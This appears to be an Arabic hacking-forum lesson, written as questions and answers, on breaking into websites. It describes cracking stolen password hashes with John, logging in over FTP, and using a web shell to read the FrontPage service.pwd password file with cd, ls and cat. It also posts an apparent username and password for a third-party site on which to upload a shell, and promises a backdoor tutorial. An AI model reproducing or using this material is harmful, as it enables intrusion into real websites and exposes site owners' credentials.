الله يعطيك العافيه والحمدلله قدرت افهم اشياء كثيره طيب الحين الاندكس بس بالمجلد الرئيسي ؟
علي ما اعتقد نعم ( غالبا )
------------
طيب يادكتور نسيت اسالك سؤال ؟
شنو السؤال ..؟
------------
الحين انا جبت باسوردات المواقع مشفره كيف افك التشفير ؟
بقول لك استخدم برنامج john واعتقد مشروح بالمنتدى
------------
طيب يعطيك العافيه ومثلا قدرت افك الباسورد المشفر كيف اقدر ادخل ؟
بقول لك تقدر من الإف تي بي او تكتب بعد رابط الموقع ..
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
------------
الله يعطيك العافيه ومن جد ماقصرت بس بسالك اقدر اشوف باسورد الموقع اذا كان يدعم الفرونت بيج ؟
بقول لك نعم تقدر وتروح للمسار التالي وانت بالشل
cd / public_html/_vti_pvt
بعدها بقول لك اعرض الملفات بالامر ls
وراح تلاحظ من الملفات الموجوده هالملف service.pwd
بتقول لي كيف اروح له بقول لك لا تروح له أقرأ الملف عادى
وادري بتسأل وتقول كيف اقرأ او شنو امر القراءة بقول لك امر القراءة هو cat
يعني نكتب الامر التالي ..
cat service.pwd
وراح تلاحظ الباسورد مشفر قدامك ان شاء الله
------------
طيب اخوى جرح ممكن تعطيني شل انت رافعه اذا ممكن بس ؟
ابشر طال عمرك وهذا موقع لك ارفع عليه شل
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
username = shawn
assword = babysox
يعطيك العافيه اخوى دكتور جرح وماقصرت يالله فمان الله
حياك الله حبيبي وفمان الكريم
------------
ملاحظة ..
باسورد فك الضغط = Dr.Jr7
------------
بالنهايه اعتذر لعدم شرحي بالصور واعتذر ان كان هناك اى خطأء والانسان
مو معصوم من الخطأ وان شاء الله في الدرس القادم راح اشرح الباكدور وكيف نرفعه
ونشغله ومن هالامور هذى وبالصور ان شاء الله
وبالاخير اتمنى للمبتدئين كل خير
